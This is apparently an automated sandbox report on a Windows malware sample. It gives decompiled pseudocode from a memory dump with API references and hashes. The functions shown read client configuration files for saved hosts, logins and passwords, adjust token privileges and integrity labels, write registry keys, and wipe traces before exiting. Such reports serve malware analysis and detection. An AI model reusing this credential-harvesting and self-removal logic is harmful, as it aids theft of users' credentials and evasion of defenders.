        • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004128BF
        • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004128D6
        • CloseHandle.KERNEL32(?,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 00412901
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
        • String ID:
        • API String ID: 3714493844-0
        • Opcode ID: 2b9835b24c31ae79a5050f280b9a39d1bff0a6a922435733b02089df75e8647b
        • Instruction ID: 4fd659553589e02be29fed0e3ff492cc7c88977c02e97eeb6d8eeb53a6d40a5e
        • Opcode Fuzzy Hash: 2b9835b24c31ae79a5050f280b9a39d1bff0a6a922435733b02089df75e8647b
        • Instruction Fuzzy Hash: 48118E31A00148BFEB106B94CE84EEE3B7DEB05350F100166F541E6160D7B99ED5EB28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 67%
        			E00407A1F(void* _a4, char _a8) {
        				char _v40;
        				char _v160;
        				char _v680;
        				void* __edi;
        				void* __esi;
        				void** _t11;
        				void* _t17;
        				void* _t19;
        				void* _t24;
        				void* _t29;
        				void* _t31;
        				WCHAR* _t35;
        
        				_t11 =  &_a4;
        				_t29 = 0;
        				__imp__ConvertSidToStringSidW(_a4, _t11);
        				if(_t11 != 0) {
        					_t38 =  &_v160;
        					E0040CA33(1,  &_v160);
        					_push(_a4);
        					_t35 =  &_v680;
        					_t17 = E00411DF9(_t38, 0x104, _t35, _t38);
        					_pop(_t31);
        					if(_t17 > 0) {
        						_t19 = 2;
        						E0040CA33(_t19,  &_v40);
        						_t24 = E004150D3(0x80000002, _t31, _t35, _t35,  &_v40, 0x104);
        						if(_t24 != 0 && _t24 != 0xffffffff) {
        							PathUnquoteSpacesW(_t35);
        							_t8 =  &_a8; // 0x405624
        							ExpandEnvironmentStringsW(_t35,  *_t8, 0x104);
        							asm("sbb bl, bl");
        							_t29 = 1;
        						}
        					}
        					LocalFree(_a4);
        				}
        				return _t29;
        			}

        APIs
        • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00407A32
        • LocalFree.KERNEL32(?,.exe,00000000), ref: 00407ABA
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 00407A9A
        • ExpandEnvironmentStringsW.KERNEL32(?,$V@,00000104), ref: 00407AA7
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
        • String ID: $V@$.exe
        • API String ID: 2200435814-3083688719
        • Opcode ID: 4accd94452d3018da89520b07c073e182a16a5e552fd26116ef8d2dc49ab9606
        • Instruction ID: 969ff949d3c7489b746113f194177ab54c20ab506cd10e8ead494315615ad2cd
        • Opcode Fuzzy Hash: 4accd94452d3018da89520b07c073e182a16a5e552fd26116ef8d2dc49ab9606
        • Instruction Fuzzy Hash: CD11C272B00114ABDB10AB7ADD49ADF3BACDF84310F004527B945F71A1DA78EA45CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004154C9(short* _a4) {
        				char _v5;
        				int _v12;
        				void* _v16;
        				void* _v20;
        				int _v24;
        				long _t18;
        
        				_v5 = 0;
        				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
        				_t33 = _t18;
        				if(_t18 == 0) {
        					_v12 = 0;
        					do {
        						E0041532E(6, 4, _t33, 2, _a4);
        						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
        							goto L4;
        						} else {
        							RegCloseKey(_v20);
        							if(_v24 == 1) {
        								_v5 = 1;
        							} else {
        								goto L4;
        							}
        						}
        						L7:
        						RegCloseKey(_v16);
        						goto L8;
        						L4:
        						_v12 = _v12 + 1;
        					} while (_v12 < 0x64);
        					goto L7;
        				}
        				L8:
        				return _v5;
        			}

        APIs
        • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 004154F1
          • Part of subcall function 0041532E: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041544F
        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00415523
        • RegCloseKey.ADVAPI32(?), ref: 0041552C
        • RegCloseKey.ADVAPI32(?), ref: 00415546
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseCreate$CharUpper
        • String ID: SOFTWARE\Microsoft$d
        • API String ID: 1794619670-1227932965
        • Opcode ID: 7c20a1f07a562ed7e99db95cb8be85ec54330ea9dc4aa21ad0ffef6db9f65af7
        • Instruction ID: f7d9bcdce10a0a4694893e4f5c9c80533c0b3d72a2a8b13692c4d9cc270dbf04
        • Opcode Fuzzy Hash: 7c20a1f07a562ed7e99db95cb8be85ec54330ea9dc4aa21ad0ffef6db9f65af7
        • Instruction Fuzzy Hash: C3118BB580020CFEEB019B949D81EFFBB7EEB44388F104062F901B6160D2758E858BB5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E00414661(intOrPtr _a4) {
        				struct _ACL* _v8;
        				struct _SECURITY_DESCRIPTOR* _v12;
        				int _v16;
        				int _v20;
        				void** _t11;
        				int _t16;
        				struct _ACL* _t18;
        
        				_t18 = 0;
        				E004127D2(L"SeSecurityPrivilege");
        				_t11 =  &_v12;
        				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
        				if(_t11 != 0) {
        					_v8 = 0;
        					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
        					if(_t16 != 0) {
        						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
        						if(_t16 == 0) {
        							_t18 = 1;
        						}
        					}
        					LocalFree(_v12);
        				}
        				return _t18;
        			}

        APIs
          • Part of subcall function 004127D2: GetCurrentThread.KERNEL32 ref: 004127E2
          • Part of subcall function 004127D2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127E9
          • Part of subcall function 004127D2: OpenProcessToken.ADVAPI32(000000FF,00000020,00404D8B,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127FB
        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00414680
        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 0041469C
        • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 004146B3
        • LocalFree.KERNEL32(?), ref: 004146C2
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
        • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
        • API String ID: 3555451682-1937014404
        • Opcode ID: d568c0cd6f0dbe94d79818d916dbfd3a375d4577492f1a4505ff72b2e796563f
        • Instruction ID: 2e5adc258d90809973483a961aaef7466a96ef4a73684203de974bfab2ef8f1d
        • Opcode Fuzzy Hash: d568c0cd6f0dbe94d79818d916dbfd3a375d4577492f1a4505ff72b2e796563f
        • Instruction Fuzzy Hash: FA0131B564020CBFEB11AFA08D85EEF7B7DEB05744F000466B601F11A1E67A9E949A28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040FA7B(void* __edx, void* __eflags, intOrPtr* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
        				char _v8;
        				long _v12;
        				char* _v16;
        				struct _GOPHER_FIND_DATAA _v20;
        				struct _GOPHER_FIND_DATAA _v24;
        				char _v28;
        				signed int _v32;
        				char _v36;
        				char _v37;
        				char _v40;
        				intOrPtr _v48;
        				char _v49;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				signed int _t69;
        				struct _GOPHER_FIND_DATAA _t72;
        				intOrPtr _t73;
        				struct _GOPHER_FIND_DATAA _t74;
        				struct _GOPHER_FIND_DATAA _t75;
        				struct _GOPHER_FIND_DATAA _t83;
        				signed int _t87;
        				struct _GOPHER_FIND_DATAA _t95;
        				struct _GOPHER_FIND_DATAA _t100;
        				int _t105;
        				struct _GOPHER_FIND_DATAA _t107;
        				struct _GOPHER_FIND_DATAA _t110;
        				struct _GOPHER_FIND_DATAA _t114;
        				intOrPtr* _t119;
        				void* _t124;
        				intOrPtr _t125;
        				void* _t129;
        				struct _GOPHER_FIND_DATAA _t134;
        				struct _GOPHER_FIND_DATAA _t137;
        				struct _GOPHER_FIND_DATAA _t138;
        				struct _GOPHER_FIND_DATAA _t142;
        				struct _GOPHER_FIND_DATAA _t148;
        
        				_t129 = __edx;
        				_v32 = _v32 | 0xffffffff;
        				EnterCriticalSection(0x41ec60);
        				_t119 = _a4;
        				_t69 = E0040F357( *_t119);
        				if(_t69 == 0xffffffff) {
        					L45:
        					LeaveCriticalSection(0x41ec60);
        					return _v32;
        				}
        				_t125 =  *0x41ec78; // 0x0
        				_t142 = _t69 * 0x24 + _t125;
        				if( *((intOrPtr*)(_t142 + 0x10)) <= 0) {
        					goto L45;
        				}
        				_v24 = _t142;
        				if( *((intOrPtr*)(_t142 + 0x10)) != 1 || ( *( *(_t142 + 0xc)) & 0x00000003) == 0) {
        					_t72 = _a16;
        					__eflags = _t72;
        					if(_t72 != 0) {
        						 *_t72 =  *_t72 & 0x00000000;
        						__eflags =  *_t72;
        					}
        					__eflags =  *((intOrPtr*)(_t142 + 0x18)) - 0xffffffff;
        					if(__eflags != 0) {
        						L35:
        						_t73 =  *((intOrPtr*)(_t142 + 0x18));
        						__eflags = _t73 - 0xffffffff;
        						if(_t73 != 0xffffffff) {
        							__eflags = _v32 - 0xffffffff;
        							if(_v32 == 0xffffffff) {
        								_t74 = _t73 -  *(_t142 + 0x1c);
        								__eflags = _t74;
        								_t134 = _t74;
        								if(_t74 != 0) {
        									__eflags = _a8;
        									if(_a8 == 0) {
        										_a12 = E0041248B(0x2000, 0x1000);
        									}
        									__eflags = _a12 - _t134;
        									_t134 =  <  ? _a12 : _t134;
        									__eflags = _a8;
        									if(_a8 != 0) {
        										E00411142(_a8,  *((intOrPtr*)(_t142 + 0x14)) +  *(_t142 + 0x1c), _t134);
        										_t64 = _t142 + 0x1c;
        										 *_t64 =  *(_t142 + 0x1c) + _t134;
        										__eflags =  *_t64;
        									}
        								}
        								_t75 = _a16;
        								__eflags = _t75;
        								if(_t75 != 0) {
        									 *_t75 = _t134;
        								}
        								_v32 = 1;
        							}
        						}
        						goto L45;
        					}
        					LeaveCriticalSection(0x41ec60);
        					_v49 = E0040F97B( &_v28, __eflags,  *_t119,  *((intOrPtr*)(_t142 + 4)),  &_v36);
        					EnterCriticalSection(0x41ec60);
        					_t83 = E004091CB();
        					_t136 = _t83;
        					_t145 = E00413240( &_v32,  *_t119);
        					_v36 = E00411346(_v36, 0, _t84);
        					__eflags = _t83;
        					if(__eflags == 0) {
        						L20:
        						__eflags = _v37;
        						if(_v37 == 0) {
        							L33:
        							_t50 =  &_v32;
        							 *_t50 = _v32 & 0x00000000;
        							__eflags =  *_t50;
        							SetLastError(0x2ee4);
        							L34:
        							_t142 = _v24;
        							goto L35;
        						}
        						_t121 =  *_t119;
        						_t87 = E0040F357( *_t119);
        						__eflags = _t87 - 0xffffffff;
        						if(_t87 == 0xffffffff) {
        							E00411106(_v36);
        							goto L33;
        						}
        						_t137 = _t87 * 0x24 +  *0x41ec78;
        						_v24 = _t137;
        						_t122 = E00413240( &_v8, _t121);
        						_t95 = E00408A1C( *((intOrPtr*)(_t137 + 0x10)),  *((intOrPtr*)(_t137 + 0xc)), _t91,  &_v40,  &_v32);
        						__eflags = _t95;
        						if(_t95 != 0) {
        							_t100 = E00411346(_v8, 0, _t122);
        							_v24 = _t100;
        							__eflags = _t100;
        							if(_t100 != 0) {
        								_v12 = 0x1000;
        								_t148 = E004110D6(0x1000);
        								__eflags = _t148;
        								if(_t148 != 0) {
        									 *_t148 = 0x50;
        									_t105 = GetUrlCacheEntryInfoW(_v16, _t148,  &_v12);
        									__eflags = _t105;
        									if(_t105 != 0) {
        										_t107 =  *(_t148 + 8);
        										__eflags = _t107;
        										if(_t107 != 0) {
        											__eflags =  *_t107;
        											if( *_t107 != 0) {
        												E00416070(_t107, _v48, _v40);
        											}
        										}
        									}
        									E00411106(_t148);
        								}
        								E00411106(_v16);
        							}
        						}
        						E00411106(_t122);
        						 *((intOrPtr*)(_t137 + 0x14)) = _v40;
        						 *(_t137 + 0x18) = _v32;
        						goto L34;
        					}
        					_t138 = E00416A93( &_v16, _t129, __eflags, _t136, 0x4e25, 0x10000000);
        					_v20 = _t138;
        					_t110 = E00411F98(_t109, _v28);
        					__eflags = _t110;
        					if(_t110 == 0) {
        						L19:
        						E00411106(_v8);
        						_t119 = _a4;
        						goto L20;
        					} else {
        						goto L10;
        					}
        					do {
        						L10:
        						__eflags =  *(_t138 + 1);
        						if( *(_t138 + 1) == 0) {
        							goto L18;
        						}
        						__eflags =  *_t138 - 0x2b;
        						if( *_t138 == 0x2b) {
        							_t124 = 4;
        							_t138 = _t138 + 1;
        							__eflags = _t138;
        						} else {
        							_t124 = 0;
        						}
        						_t128 = _t138;
        						_t114 = E00407B90(_t138, 0, _t145, _v20);
        						__eflags = _t114;
        						if(_t114 != 0) {
        							__eflags = _t124 - 4;
        							if(_t124 == 4) {
        								E0040845B(_t128, 0, _v12, 0, 1);
        							}
        							__eflags = _t124 - 2;
        							if(_t124 != 2) {
        								goto L19;
        							}
        						}
        						L18:
        						_t138 = E00411FD6(_t138, 1);
        						__eflags = _t138;
        					} while (_t138 != 0);
        					goto L19;
        				} else {
        					 *_t119 =  *((intOrPtr*)(_t142 + 0x20));
        					goto L45;
        				}
        			}









































        APIs
        • EnterCriticalSection.KERNEL32(0041EC60), ref: 0040FA92
        • LeaveCriticalSection.KERNEL32(0041EC60), ref: 0040FAF5
        • EnterCriticalSection.KERNEL32(0041EC60), ref: 0040FB15
        • GetUrlCacheEntryInfoW.WININET(?,00000000,?), ref: 0040FC4A
        • LeaveCriticalSection.KERNEL32(0041EC60), ref: 0040FD15
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterLeave$CacheEntryInfo
        • String ID:
        • API String ID: 4230765043-0
        • Opcode ID: b36fcae4a890c18a0c8cb39e2618034a1804c4b62b4248cf0081630c90613d0d
        • Instruction ID: b1620a93fae71bc2132c2368271f7604e76644449d7e1ec5af53f54e0245313c
        • Opcode Fuzzy Hash: b36fcae4a890c18a0c8cb39e2618034a1804c4b62b4248cf0081630c90613d0d
        • Instruction Fuzzy Hash: AD818B31504305ABDB20DF25C885B5BB7E4BF88314F040A3EF995A76E1D738E989CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E0040AFE4(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
        				short _v524;
        				short _v528;
        				char _v568;
        				short _v584;
        				char _v596;
        				short _v600;
        				char _v608;
        				short _v612;
        				char _v616;
        				short _v620;
        				char _v624;
        				short _v628;
        				short* _v632;
        				WCHAR* _v636;
        				WCHAR* _v640;
        				WCHAR* _v644;
        				WCHAR* _v648;
        				WCHAR* _v652;
        				void* __edi;
        				void* __esi;
        				WCHAR* _t54;
        				WCHAR* _t57;
        				void* _t61;
        				void* _t63;
        				void* _t65;
        				void* _t67;
        				void* _t69;
        				WCHAR* _t72;
        				WCHAR* _t74;
        				long _t78;
        				int _t81;
        				long _t85;
        				long _t88;
        				WCHAR* _t89;
        				void* _t90;
        				WCHAR* _t94;
        				WCHAR* _t95;
        				WCHAR* _t111;
        				WCHAR* _t112;
        				WCHAR* _t117;
        				intOrPtr _t126;
        				signed int _t127;
        				void* _t129;
        
        				_t129 = (_t127 & 0xfffffff8) - 0x284;
        				if(E00416745( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
        					L21:
        					return 1;
        				}
        				_t132 =  *__edx & 0x00000010;
        				if(( *__edx & 0x00000010) == 0) {
        					_t117 = E004110D6(0x1fffe);
        					_v628 = _t117;
        					__eflags = _t117;
        					if(_t117 == 0) {
        						goto L21;
        					}
        					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
        					__eflags = _t54;
        					if(_t54 <= 0) {
        						L20:
        						E00411106(_t117);
        						goto L21;
        					}
        					_t9 =  &(_t54[0]); // 0x1
        					_t57 = E00411FB6(_t117, _t9);
        					__eflags = _t57;
        					if(_t57 == 0) {
        						goto L20;
        					}
        					_t111 = E004110D6(0xc1c);
        					_v640 = _t111;
        					__eflags = _t111;
        					if(_t111 != 0) {
        						_t11 =  &(_t111[0x2fd]); // 0x5fa
        						_v632 = _t11;
        						_v644 = _t117;
        						_t61 = 0x72;
        						E0040CA33(_t61,  &_v584);
        						_t63 = 0x73;
        						E0040CA33(_t63,  &_v596);
        						_t65 = 0x74;
        						E0040CA33(_t65,  &_v608);
        						_t67 = 0x75;
        						E0040CA33(_t67,  &_v624);
        						_t69 = 0x76;
        						E0040CA33(_t69,  &_v616);
        						goto L9;
        						L18:
        						_t74 = E00411FF2(_v648, 1);
        						_v652 = _t74;
        						__eflags = _t74;
        						if(_t74 != 0) {
        							_t111 = _v644;
        							L9:
        							_t72 = StrStrIW(_v644,  &_v584);
        							__eflags = _t72;
        							if(_t72 == 0) {
        								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
        								__eflags = _t78;
        								if(_t78 != 0) {
        									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
        									_v640 = _t81;
        									__eflags = _t81 - 1 - 0xfffe;
        									if(_t81 - 1 <= 0xfffe) {
        										_t112 =  &(_t111[0xff]);
        										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
        										__eflags = _t85;
        										if(_t85 != 0) {
        											_t33 =  &(_t112[0xff]); // 0x0
        											_t124 = _t33;
        											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
        											__eflags = _t88;
        											if(_t88 != 0) {
        												_t89 = E00411C55(_t124);
        												__eflags = _t89;
        												if(_t89 > 0) {
        													_t125 =  &_v568;
        													_t90 = 0x55;
        													E0040CA33(_t90,  &_v568);
        													_push(_v640);
        													_t38 =  &(_t112[0xff]); // 0x0
        													_push(_v644);
        													_push(_t112);
        													_t113 = _v636;
        													_t94 = E00411DF9(_t125, 0x311, _v636, _t125);
        													_t129 = _t129 + 0x14;
        													__eflags = _t94;
        													if(_t94 > 0) {
        														_t126 = _a4;
        														_t95 = E004114FA(_t94, _t126, _t113);
        														__eflags = _t95;
        														if(_t95 != 0) {
        															_t42 = _t126 + 4;
        															 *_t42 =  &(( *(_t126 + 4))[0]);
        															__eflags =  *_t42;
        														}
        													}
        												}
        											}
        										}
        									}
        								}
        							}
        							goto L18;
        						}
        						E00411106(_v644);
        						_t117 = _v636;
        					}
        					goto L20;
        				} else {
        					E0040AFAC(_t132,  &_v524, _a4);
        					goto L21;
        				}
        			}















































        APIs
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • GetPrivateProfileStringW.KERNEL32 ref: 0040B059
        • StrStrIW.SHLWAPI(?,?), ref: 0040B0E6
        • GetPrivateProfileStringW.KERNEL32 ref: 0040B10E
        • GetPrivateProfileIntW.KERNEL32 ref: 0040B12B
        • GetPrivateProfileStringW.KERNEL32 ref: 0040B15C
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfile$String$CombinePath
        • String ID:
        • API String ID: 2134968610-0
        • Opcode ID: 937cabdef85e42db54521cd274822ade0ddd2daa839fa3ae1e9f4bc51b6c9373
        • Instruction ID: 4c995a1cef47ed7fb47bc366f3fbe69fa515b374cdee71186195bbf4546755d2
        • Opcode Fuzzy Hash: 937cabdef85e42db54521cd274822ade0ddd2daa839fa3ae1e9f4bc51b6c9373
        • Instruction Fuzzy Hash: 81518232504306ABDB10DB55CC51EEBB7E8EF88744F00093AB994E72A1DB38D945CB9A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E0040ABED(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
        				WCHAR* _v8;
        				WCHAR* _v12;
        				short* _v16;
        				WCHAR* _v20;
        				short _v32;
        				short _v48;
        				short _v68;
        				short _v88;
        				short _v112;
        				char _v144;
        				void* __edi;
        				void* __esi;
        				WCHAR* _t40;
        				long _t41;
        				void* _t48;
        				void* _t50;
        				void* _t52;
        				void* _t54;
        				void* _t56;
        				WCHAR* _t61;
        				WCHAR* _t64;
        				void* _t72;
        				void* _t76;
        				WCHAR* _t83;
        				WCHAR* _t84;
        				WCHAR* _t86;
        				intOrPtr _t96;
        				void* _t97;
        
        				_t81 = __edx;
        				_t40 = E004110D6(0x1fffe);
        				_t86 = _t40;
        				_v20 = _t86;
        				if(_t86 == 0) {
        					return _t40;
        				}
        				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
        				if(_t41 <= 0) {
        					L17:
        					return E00411106(_t86);
        				}
        				_t3 = _t41 + 1; // 0x1
        				if(E00411FB6(_t86, _t3) == 0) {
        					goto L17;
        				}
        				_t83 = E004110D6(0xc08);
        				_v12 = _t83;
        				if(_t83 == 0) {
        					goto L17;
        				} else {
        					_t5 =  &(_t83[0x2fd]); // 0x5fa
        					_v16 = _t5;
        					_v8 = _t86;
        					_t48 = 0x65;
        					E0040CA33(_t48,  &_v112);
        					_t50 = 0x66;
        					E0040CA33(_t50,  &_v48);
        					_t52 = 0x67;
        					E0040CA33(_t52,  &_v32);
        					_t54 = 0x68;
        					E0040CA33(_t54,  &_v88);
        					_t56 = 0x69;
        					E0040CA33(_t56,  &_v68);
        					goto L6;
        					L15:
        					_t61 = E00411FF2(_v8, 1);
        					_v8 = _t61;
        					if(_t61 != 0) {
        						_t83 = _v12;
        						L6:
        						if(StrStrIW(_v8,  &_v112) == 0) {
        							_t64 = StrStrIW(_v8,  &_v48);
        							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
        								_t84 =  &(_t83[0xff]);
        								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
        									_t26 =  &(_t84[0xff]); // 0x0
        									_t94 = _t26;
        									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E0040AA82(_t81, _t94) > 0) {
        										_t95 =  &_v144;
        										_t72 = 0x56;
        										E0040CA33(_t72,  &_v144);
        										_push(_v12);
        										_t30 =  &(_t84[0xff]); // 0x0
        										_push(_t84);
        										_t85 = _v16;
        										_t81 = 0x307;
        										_t76 = E00411DF9(_t95, 0x307, _v16, _t95);
        										_t97 = _t97 + 0x10;
        										if(_t76 > 0) {
        											_t96 = _a8;
        											if(E004114FA(_t76, _t96, _t85) != 0) {
        												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
        											}
        										}
        									}
        								}
        							}
        						}
        						goto L15;
        					} else {
        						E00411106(_v12);
        						_t86 = _v20;
        						goto L17;
        					}
        				}
        			}
































        APIs
        • GetPrivateProfileStringW.KERNEL32 ref: 0040AC24
          • Part of subcall function 004110D6: HeapAlloc.KERNEL32(00000008,-00000004,004128A4,00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004110E7
        • StrStrIW.SHLWAPI(?,?), ref: 0040ACAC
        • StrStrIW.SHLWAPI(?,?), ref: 0040ACBD
        • GetPrivateProfileStringW.KERNEL32 ref: 0040ACD9
        • GetPrivateProfileStringW.KERNEL32 ref: 0040ACF7
        • GetPrivateProfileStringW.KERNEL32 ref: 0040AD11
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfileString$AllocHeap
        • String ID:
        • API String ID: 2479592106-0
        • Opcode ID: 2723e1f6f8c43eafb8186d9b65ddac2be5b64aff75321912f9b90b9aece90382
        • Instruction ID: b802708dbaa5b71d6d8ecd423b6b0798cdfa7e3fe1f80c9dfbcd1a67840d2701
        • Opcode Fuzzy Hash: 2723e1f6f8c43eafb8186d9b65ddac2be5b64aff75321912f9b90b9aece90382
        • Instruction Fuzzy Hash: 7F417E32D0021AFBDF10EBA5CC41AEEBB7AAF44754F144026B904B72A1D7399E168B95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040570F(void* __ebx, void* __ecx, void* __eflags) {
        				char _v1168;
        				char _v1668;
        				char _v1680;
        				short _v1688;
        				char _v2192;
        				short _v2208;
        				char _v2720;
        				char _v2728;
        				char _v2992;
        				char _v3072;
        				void* __edi;
        				void* __esi;
        				void* _t34;
        				WCHAR* _t50;
        				WCHAR* _t51;
        				WCHAR* _t52;
        				void* _t65;
        
        				_t65 = __eflags;
        				_t46 = __ecx;
        				_t50 =  &_v1668;
        				E00406D1E(__ecx, _t50, 1);
        				PathRemoveFileSpecW(_t50);
        				_t51 =  &_v2192;
        				E00406D1E(_t46, _t51, 2);
        				PathRemoveFileSpecW(_t51);
        				 *0x41e590 =  *0x41e590 | 0x00000002;
        				_push(0);
        				E00404C55();
        				E00405D8B(_t46, _t65);
        				E0041652E( &_v1680, _t65);
        				E0041652E(_t51, _t65);
        				_t52 =  &_v2720;
        				E00406D1E(_t51, _t52, 3);
        				SHDeleteKeyW(0x80000001, _t52);
        				CharToOemW( &_v1688,  &_v2728);
        				CharToOemW( &_v2208,  &_v2992);
        				_t53 =  &_v3072;
        				_t34 = 4;
        				E0040C9FD(_t34,  &_v3072);
        				_push( &_v2992);
        				_push( &_v2728);
        				_push( &_v2992);
        				_push( &_v2728);
        				if(E00411E3D( &_v3072, 0x474,  &_v1168, _t53) > 0) {
        					E00412BC6(__ebx, 0x474,  &_v1168);
        				}
        				if( *0x41eaa0 == 0xffffffff) {
        					ExitProcess(0);
        				}
        				return 1;
        			}





















        APIs
          • Part of subcall function 00406D1E: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97
        • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00405734
        • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00405747
          • Part of subcall function 00404C55: SetEvent.KERNEL32(00405757,00000000), ref: 00404C5B
          • Part of subcall function 00404C55: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404C6E
          • Part of subcall function 00405D8B: SHDeleteValueW.SHLWAPI(80000001,?,?,C003C81E,?,00000000,?,750D46D0), ref: 00405DC7
          • Part of subcall function 00405D8B: Sleep.KERNEL32(000001F4), ref: 00405DD6
          • Part of subcall function 00405D8B: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00405DEC
          • Part of subcall function 0041652E: FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041655F
          • Part of subcall function 0041652E: FindNextFileW.KERNEL32(00000000,?), ref: 004165BA
          • Part of subcall function 0041652E: FindClose.KERNEL32(00000000), ref: 004165C5
          • Part of subcall function 0041652E: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 004165D1
          • Part of subcall function 0041652E: RemoveDirectoryW.KERNEL32(?), ref: 004165D8
        • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00405785
        • CharToOemW.USER32 ref: 004057A1
        • CharToOemW.USER32 ref: 004057B0
        • ExitProcess.KERNEL32 ref: 00405806
          • Part of subcall function 00412BC6: CharToOemW.USER32 ref: 00412BF6
          • Part of subcall function 00412BC6: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00412C7A
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
